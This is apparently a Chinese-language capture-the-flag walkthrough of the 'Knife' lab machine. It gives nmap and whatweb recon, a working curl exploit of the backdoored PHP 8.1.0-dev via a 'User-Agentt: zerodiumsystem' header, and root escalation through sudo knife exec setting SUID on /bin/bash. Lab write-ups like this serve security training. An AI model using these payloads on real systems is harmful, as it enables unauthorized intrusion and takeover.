Knife
Recon
Ports
nmap -sT -A -p22,80 10.129.245.100
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-21 13:21 CST
Nmap scan report for 10.129.245.100
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Emergent Medical Idea
|_http-server-header: Apache/2.4.41 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 97.93 ms 10.10.14.1
2 99.32 ms 10.129.245.100
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.94 seconds
存在22,80端口。 访问80端口,是一个静态网页,对目录进行了多次扫描,无有用信息。 whatweb查看网页架构:
whatweb http://10.129.245.100/
http://10.129.245.100/ [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.129.245.100], PHP[**8.1.0-dev**], Script, Title[Emergent Medical Idea], X-Powered-By[PHP/8.1.0-dev]
PHP版本为8.1.0-dev,搜索得知存在后门利用漏洞。 尝试利用:
curl -X GET -v http://10.129.245.100/ \
-H "User-Agentt: zerodiumsystem('id');" | head -n 3
Note: Unnecessary use of -X or --request, GET is already inferred.
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Trying 10.129.245.100:80...
* Connected to 10.129.245.100 (10.129.245.100) port 80
* using HTTP/1.x
> GET / HTTP/1.1
> Host: 10.129.245.100
> User-Agent: curl/8.13.0
> Accept: */*
> User-Agentt: zerodiumsystem('id');
>
* Request completely sent off
< HTTP/1.1 200 OK
< Date: Wed, 21 May 2025 06:38:13 GMT
< Server: Apache/2.4.41 (Ubuntu)
< X-Powered-By: PHP/8.1.0-dev
< Vary: Accept-Encoding
< Transfer-Encoding: chunked
< Content-Type: text/html; charset=UTF-8
<
{ [5128 bytes data]
100 5866 0 5866 0 0 272uid=1000(james) gid=1000(james) groups=1000(james)
49<!DOCTYPE html>
<html lang="en" >
100 5866 0 5866 0 0 27108 0 --:--:-- --:--:-- --:--:-- 27032
* Connection #0 to host 10.129.245.100 left intact
可以看到有回显。
User and Root
得到反弹shell后,发现当前用户为james
id
uid=1000(james) gid=1000(james) groups=1000(james)
sudo -l 发现
sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
knife 是 Chef 的命令行工具,用于与 Chef Server、节点、cookbook、data bag、环境等资源进行交互和管理。它是 DevOps 中基础设施即代码(IaC)实践的核心组件之一。
提权点
knife下存在一个exec模板,允许我们执行ruby脚本。这里我们创建一个提权脚本,直接运行。
system("chmod u+s /bin/bash")
Summary
老机器,easypuzzle。